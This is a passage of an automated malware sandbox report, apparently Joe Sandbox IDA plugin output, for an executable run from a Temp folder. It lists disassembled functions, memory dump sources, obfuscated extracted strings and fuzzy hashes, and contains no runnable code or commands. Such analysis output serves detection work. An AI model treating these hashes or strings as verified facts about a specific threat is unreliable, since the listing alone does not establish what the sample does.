                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: , D$- D$- D$-Mp$-Mp$.]c$.]c$3{$CKv$DKv$DKv$H>A$H>A$L,\l$L,\l$L!l$M!l$M!l$M!l$Vp\*$Vp\*$Z@b$[@b$[@b$a`P$b`P$b`P$oMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pMkl$pS$pS$^+8$^+8$^+8
                                                                                • API String ID: 0-3060701247
                                                                                • Opcode ID: d0c055135f0365669ed6390500889401e5a9bc649a1eb788d5c4ea856c5a02a7
                                                                                • Instruction ID: 94a1d8ac78643cc6211be6250f5fa18c321f222a884804859dd703d1b235ef73
                                                                                • Opcode Fuzzy Hash: d0c055135f0365669ed6390500889401e5a9bc649a1eb788d5c4ea856c5a02a7
                                                                                • Instruction Fuzzy Hash: F5B3FD25A08FC68AEB788F35E8A07FC37A1FF44749F51453AC68ECBB94CE2995408745
                                                                                Function 00007FF6CC369830 Relevance: 39.6, Strings: 29, Instructions: 3345COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: -gq|$-gq|$-gq|$0Ki$0Ki$1\Vg$1\Vg$E<i$E<i$J}m$J}m$O\V$O\V$^\~H$_\~H$_\~H$iH>l$jH>l$jH>l$lRE0$lRE0$sS.$tS.$tS.$z>J$z>J$z>J$fC$fC
                                                                                • API String ID: 0-1980736421
                                                                                • Opcode ID: e6e0f91390640d63ce615629dce2d8d2f95daeff08d0a49a14c75d8e99035874
                                                                                • Instruction ID: d91cddcc3068662596ee8bc8add5adfce3ab4bb21cea141d12b88f640e1cbdeb
                                                                                • Opcode Fuzzy Hash: e6e0f91390640d63ce615629dce2d8d2f95daeff08d0a49a14c75d8e99035874
                                                                                • Instruction Fuzzy Hash: 5B73B826A18FC589DBB88F25A8A07FD23D1FB44759F10413ADA8FCFB94CE299650C705
                                                                                Function 00007FF6CC3B8AB0 Relevance: 35.3, APIs: 3, Strings: 16, Instructions: 2093COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: D_oq$E_oq$E_oq$SKp/$TKp/$TKp/$^t.+$^t.+$|1U$|1U$P$$P$$P$$P$$_P"$_P"
                                                                                • API String ID: 0-202705158
                                                                                • Opcode ID: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
                                                                                • Instruction ID: 71d99aeabb6bf1d61017b4a70a2936b410723cd4edd0e2834cdfab0a75f0f736
                                                                                • Opcode Fuzzy Hash: 5ae6cf0d20ebf4617df430b177d3a2d887465d54666ff657e073a06b436cc771
                                                                                • Instruction Fuzzy Hash: BE239976A15FC589DB788F35E8E46FD33A0EB48799F504136DE8E8BB54CE38A6418301
                                                                                Function 00007FF6CC386DF0 Relevance: 34.5, Strings: 27, Instructions: 769COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: r$r$r$ Kc$#@+!$#cZ2$#cZ2$$@+!$9\4P$9\4P$AlC($M9$N9$N9$Va$Va$Wv4-$eSTl$eqE$fqE$fqE$kZ(M$lZ(M$lZ(M$unordered_map/set too long$^'$^'
                                                                                • API String ID: 0-2172891005
                                                                                • Opcode ID: db7b9c826f139c0146d2a4938a26e309d81a54ab8daca80f1c3122a56204b761
                                                                                • Instruction ID: a4786b4f03b60efc771dce01a351ab63a1ec0f743f43637225b4b2d9bbbc515c
                                                                                • Opcode Fuzzy Hash: db7b9c826f139c0146d2a4938a26e309d81a54ab8daca80f1c3122a56204b761
                                                                                • Instruction Fuzzy Hash: D472E632B1C6C686EA748E29B194E7E67A1EF85755F204533F9CDC7B98CE2CE4408B41
                                                                                Function 00007FF6CC33C400 Relevance: 33.2, Strings: 25, Instructions: 1974COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: q4$q4$%$Ip$%$Ip$@Y7@$@Y7@$O(A$P(A$P(A$Rw]0$Rw]0$Rw]0$^z.5$^z.5$sG%$tG%$tG%$tG%$l6"$l6"$l6"$o>;$o>;$y$y
                                                                                • API String ID: 0-3491445807
                                                                                • Opcode ID: f7c8656d2065eb2fe3548c5955c9e3a99476b11462d2496d06f51086147827df
                                                                                • Instruction ID: c94be2ae121d8b2587f65578db562ab038b8c3f50590ce28345b8af624284af9
                                                                                • Opcode Fuzzy Hash: f7c8656d2065eb2fe3548c5955c9e3a99476b11462d2496d06f51086147827df
                                                                                • Instruction Fuzzy Hash: FF131837A0D6C186EA758E29B0906BE7BD0EBC5712F184236EACDC7BD4DE2CD4418B11
                                                                                Function 00007FF6CC376DE0 Relevance: 31.9, Strings: 24, Instructions: 1944COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !s($ !s($ !s($ !s($ !s($ !s($ !s($/R{m$/R{m$3nzt$3nzt$B|9,$B|9,$B|9,$B|9,$ON9$PN9$PN9$`@u$`@u$gO6`$gO6`$3X$3X
                                                                                • API String ID: 0-470075873
                                                                                • Opcode ID: 39a5832a991fc4bcebe2d9129d18d74263d6f7e85bbb63d29bf8438b68520ba0
                                                                                • Instruction ID: 75af459f07f1d07983a68ddf1d9efcd80a91f0bae390651423f5c436e52beef6
                                                                                • Opcode Fuzzy Hash: 39a5832a991fc4bcebe2d9129d18d74263d6f7e85bbb63d29bf8438b68520ba0
                                                                                • Instruction Fuzzy Hash: FC13DD25B0C6C2C6FA784E18B394A7EA6A1AB55312F344932D5CDC7FD4CE1CE450BB52
                                                                                Function 00007FF6CC35D390 Relevance: 30.4, Strings: 23, Instructions: 1655COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "2ZB$"2ZB$;#%$;#%$;,y3$;,y3$;,y3$;<b$<<b$<<b$<<b$<<b$@MC$@r#X$AMC$AMC$Ar#X$Ar#X$QRd`$RRd`$RRd`$s|x2$s|x2
                                                                                • API String ID: 0-4187098220
                                                                                • Opcode ID: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
                                                                                • Instruction ID: cd477841cc53c7fe59e272eb7d8b72fb8500921c3ac792a6fe54032596d36f7e
                                                                                • Opcode Fuzzy Hash: a3beb7743ee411619cbc84fe7a547004e476f0c5cac0f5f1b6fbfb7994ea97ea
                                                                                • Instruction Fuzzy Hash: DAF2F976A0C6C686EA758F18B584ABE77D0EB84756F104572D9CEC77A8CE2CF4C08B41
                                                                                Function 00007FF6CC360740 Relevance: 27.1, Strings: 21, Instructions: 864COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !k5$"k5$"k5$"k5$"k5$GSM-$HSM-$HSM-$V}M$V}M$V}M$|k+$}k+$}k+$~0%)$~0%)$q\z$q\z$q\z$q\z$q\z
                                                                                • API String ID: 0-2622637242
                                                                                • Opcode ID: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
                                                                                • Instruction ID: 0db86e5d6d14d870c760458e2532686078cab4a8e760ebf51ffa680fda029090
                                                                                • Opcode Fuzzy Hash: 23c035e364f866626612a08a79a8392bf26121028d3385ea37c6c98ee372165f
                                                                                • Instruction Fuzzy Hash: D482D875A0CFC686EA748E19B181A7EB7A1FB54751F204132EACDC7BA4CF2CD4418B85
                                                                                Function 00007FF6CC3364A0 Relevance: 26.3, Strings: 19, Instructions: 2521COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 6;ti$@{9s$A{9s$A{9s$A{9s$A{9s$Cs6$Cs6$VFL($VFL($iyku$jyku$jyku$w"a$x"a$x"a$a[$a[$a[
                                                                                • API String ID: 0-3286678768
                                                                                • Opcode ID: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
                                                                                • Instruction ID: 0538bb1e2f3b210937db31b2ee570444ed71bac3d9249a420cd1370e8f1eed6e
                                                                                • Opcode Fuzzy Hash: e9a0b6bf3d01fc20507b5053a27a964f9a557d6c6714163e7e5dde813e8cfd6f
                                                                                • Instruction Fuzzy Hash: 2A33EB3670C7C589EE784E15B094ABE63A1FB857A1F180137DACEC7BA8DE2CD4418B15
                                                                                Function 00007FF6CC392010 Relevance: 21.6, APIs: 3, Strings: 9, Instructions: 618COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 'fj&$(fj&$(fj&$gqYG$gqYG$gqYG$.NP$.NP$.NP
                                                                                • API String ID: 0-4046524389
                                                                                • Opcode ID: 0c434476c7000b30d91b4396411714a4663a08d5c183c151bf309e51ec6473f1
                                                                                • Instruction ID: 3ff0f5fb60b4d175eeeae97c2c36369bc7d675fce6c61d50f3a94740171a3e61
                                                                                • Opcode Fuzzy Hash: 0c434476c7000b30d91b4396411714a4663a08d5c183c151bf309e51ec6473f1
                                                                                • Instruction Fuzzy Hash: 2842FC36E09EC18AFF748F7DA490BBD2691AB04369F204536E98DC7794CE2EE850C745
                                                                                Function 00007FF6CC395B80 Relevance: 20.9, Strings: 15, Instructions: 2162COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 9sJZ$9sJZ$>(q$>(q$>(q$>(q${bC$|bC$|bC$Ap1$Ap1$h,]$h,]$/$/
                                                                                • API String ID: 0-1954784225
                                                                                • Opcode ID: 93236e171aa9b9fa76f1c19fe02afa14951cf721eac059640852670209ccd1f5
                                                                                • Instruction ID: a4fcc840ca3eee79b23945ac87a64679ab11d595d26b5c9c2db8e41683cf42db
                                                                                • Opcode Fuzzy Hash: 93236e171aa9b9fa76f1c19fe02afa14951cf721eac059640852670209ccd1f5
                                                                                • Instruction Fuzzy Hash: 2223FB36B0E6C686EAB84F15F094B7E62A1EB85395F544136DACDC7BD4CE3CE8808741
                                                                                Function 00007FF6CC388C10 Relevance: 19.4, Strings: 15, Instructions: 662COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Kc$6AC>$6AC>$@lC($AlC($Vv4-$Va$Wv4-$dSTl$eBal$eBal$eSTl$eqE$y+o$y+o
                                                                                • API String ID: 0-1434796071
                                                                                • Opcode ID: 08706db2ba4042d8eeb38500a8f06852f9eb17d1b0b20a257fa6f1ffc6ad454f
                                                                                • Instruction ID: 048ffb5f2705f12c6763bcf2790ad3928f9f5efcaee69e6aeaaf8f9bcd096d51
                                                                                • Opcode Fuzzy Hash: 08706db2ba4042d8eeb38500a8f06852f9eb17d1b0b20a257fa6f1ffc6ad454f
                                                                                • Instruction Fuzzy Hash: EC528536A0D7C986DA748E25B490E7E67A0EB95741F244537DECDC7B94CF2CE8848B02
                                                                                Function 00007FF6CC35B6A0 Relevance: 17.5, Strings: 13, Instructions: 1290COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: )q$*q$*q$?c$?c$PF&+$PF&+$WKn'$XKn'$XKn'$a<i$b<i$b<i
                                                                                • API String ID: 0-253853581
                                                                                • Opcode ID: 63045c5d6da34dd7a7737eb795c88a8a81786b50ae78e7f5d83fe896f7367834
                                                                                • Instruction ID: 5e0acafa7674203676b24ef779f650abdb8124f70af8b4400de70351b0fcfeae
                                                                                • Opcode Fuzzy Hash: 63045c5d6da34dd7a7737eb795c88a8a81786b50ae78e7f5d83fe896f7367834
                                                                                • Instruction Fuzzy Hash: 7AC2E876F096C68AEB748E39A894BFD3390EB4875DF205936DA8DCB794CE38D5408341
                                                                                Function 00007FF6CC3743B0 Relevance: 16.0, Strings: 12, Instructions: 1036COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: r2'a$r2'a$s"$t"$t"$ISB$ISB$p2$p2$)m$)m$)m
                                                                                • API String ID: 0-611830788
                                                                                • Opcode ID: c744fb4b3b0de88feaa83e13d8276a0772e16af085ef348dccac86445c8ddbf8
                                                                                • Instruction ID: aeb6c471f22a90a894a11052ea3b14098222f57ee972aadb2c0908c2cb42ca17
                                                                                • Opcode Fuzzy Hash: c744fb4b3b0de88feaa83e13d8276a0772e16af085ef348dccac86445c8ddbf8
                                                                                • Instruction Fuzzy Hash: B2A2D822A0DAC5C6EB748F14B584A7E63D0EB85755F248636EACDC7F94CE2CE450AF01
                                                                                Function 00007FF6CC344BF0 Relevance: 13.3, Strings: 10, Instructions: 766COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: N(5$N(5$Yf F$Yf F$Yf F$Yf F$Yf F$Yf F$|r1$|r1
                                                                                • API String ID: 0-2101519453
                                                                                • Opcode ID: f8009be155dd3915636a99641ee24c256478b9ce509bbcfda1072173e71214f3
                                                                                • Instruction ID: c604e101ba8434b5a7db9ec34206519f3008105ebb3d360fe3e48eebb4314204
                                                                                • Opcode Fuzzy Hash: f8009be155dd3915636a99641ee24c256478b9ce509bbcfda1072173e71214f3
                                                                                • Instruction Fuzzy Hash: C8620832E081C69BFB68DE39B4C097D2ED1AB54356F248436E98DD7BD4CD2EEC804641
                                                                                Function 00007FF6CC34D7A0 Relevance: 13.0, Strings: 10, Instructions: 480COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: <OJ/$=OJ/$=OJ/$=OJ/$C:\Users\user\AppData\Local\Temp\6267.exe$wsG5$xsG5$xsG5$`4H$`4H
                                                                                • API String ID: 0-213417710
                                                                                • Opcode ID: 98e02864a0ecfe842e897b2ba808a186c900f3ea0867794542303abde7885019
                                                                                • Instruction ID: 5fc3281dd520507367a41828affa5dd4bef9373e098c256e26c3d2d46655e2b7
                                                                                • Opcode Fuzzy Hash: 98e02864a0ecfe842e897b2ba808a186c900f3ea0867794542303abde7885019
                                                                                • Instruction Fuzzy Hash: AC12FC25B0C2C18BE675CE28F490B7E6E919B45316F244576EBDDCB7D5CE2EE8408B01
                                                                                Function 00007FF6CC38F370 Relevance: 12.7, Strings: 9, Instructions: 1495COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ,)W$-)W$-)W$Liz $Miz $Miz $iq*$iq*$iq*
                                                                                • API String ID: 0-548768203
                                                                                • Opcode ID: 590b667553db37ad33d46751793886593c5a05ea0047d72605d724c0ba00543e
                                                                                • Instruction ID: 35bc7b041990467b009f86941fb7662c55fca47aa479256fe8cf6e39f550578a
                                                                                • Opcode Fuzzy Hash: 590b667553db37ad33d46751793886593c5a05ea0047d72605d724c0ba00543e
                                                                                • Instruction Fuzzy Hash: 3AE2D636A0DBC582EA748F19B494BBE6390EB88755F205537DACDC7BA9CE3CD4408B05
                                                                                Function 00007FF6CC38B020 Relevance: 12.6, Strings: 9, Instructions: 1361COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: !cH$!cH$invalid hash bucket count$n.P'$n.P'$tcD$tcD$~hP$~hP
                                                                                • API String ID: 0-2997982297
                                                                                • Opcode ID: 371beb06c535d3b50fe6b93fd2ad4316a0ef0bbb543f4400f09f43fed1dad634
                                                                                • Instruction ID: 1bfd01e200c9514be063213664a3ad22d973b69d7072a811c3a282dcb6446fc3
                                                                                • Opcode Fuzzy Hash: 371beb06c535d3b50fe6b93fd2ad4316a0ef0bbb543f4400f09f43fed1dad634
                                                                                • Instruction Fuzzy Hash: 75D2B876A0C6C686DA788E15B4B0EBE6251EBC4749F20403BDADED3B94DF2DD440CB46
                                                                                Function 00007FF6CC383E80 Relevance: 12.6, Strings: 9, Instructions: 1321COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: h1$h1$(qk$)qk$)qk$,VT$,VT$bGI$bGI
                                                                                • API String ID: 0-3994866152
                                                                                • Opcode ID: 5f0aded68d93b38d3c0cdba68b69595bf087ed76d83e8bf942bde98cdc35d4ce
                                                                                • Instruction ID: ffd627328916ebc44b0d9eb0920da03c68f0b9d0432abf4d77133a711b223a33
                                                                                • Opcode Fuzzy Hash: 5f0aded68d93b38d3c0cdba68b69595bf087ed76d83e8bf942bde98cdc35d4ce
                                                                                • Instruction Fuzzy Hash: 86D29262A0C7C186EB748E18B060BBEA7A0F795755F204627DADDC7FA4DF2DE4809701
                                                                                Function 00007FF6CC3A5D40 Relevance: 11.9, Strings: 9, Instructions: 654COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000006.00000002.2435422359.00007FF6CC331000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6CC330000, based on PE: true
                                                                                • Associated: 00000006.00000002.2435396684.00007FF6CC330000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435476957.00007FF6CC3BD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                • Associated: 00000006.00000002.2435572500.00007FF6CC422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_6_2_7ff6cc330000_6267.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ) )~$) )~$*TZ%$*TZ%$7ZX$7ZX$_^|$_^|$_^|
